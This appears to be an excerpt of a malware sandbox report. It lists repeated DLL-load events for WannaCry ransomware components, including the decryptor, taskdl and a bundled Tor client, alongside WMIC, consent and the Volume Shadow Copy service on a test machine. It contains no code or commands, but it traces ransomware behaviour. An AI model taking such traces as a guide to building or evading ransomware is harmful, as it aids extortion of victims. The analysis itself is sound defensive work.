              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: pcacli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\consent.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\consent.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\consent.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\consent.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\consent.exeSection loaded: wmsgapi.dll
              Source: C:\Windows\System32\consent.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\consent.exeSection loaded: msctfmonitor.dll
              Source: C:\Windows\System32\consent.exeSection loaded: msimg32.dll
              Source: C:\Windows\System32\consent.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\consent.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\consent.exeSection loaded: msutb.dll
              Source: C:\Windows\System32\consent.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\consent.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\consent.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\consent.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\consent.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\consent.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\consent.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\consent.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\consent.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\consent.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\consent.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\consent.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\consent.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\consent.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: libevent-2-0-5.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: libssp-0.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: libeay32.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: ssleay32.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: zlib1.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: libssp-0.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: libgcc_s_sjlj-1.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: libgcc_s_sjlj-1.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: libssp-0.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: libssp-0.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: netapi32.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: wkscli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: netapi32.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: wkscli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: netapi32.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: wkscli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: authz.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: virtdisk.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: bcd.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: fltlib.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: es.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: vss_ps.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: catsrvut.dll
              Source: C:\Windows\System32\VSSVC.exeSection loaded: mfcsubs.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
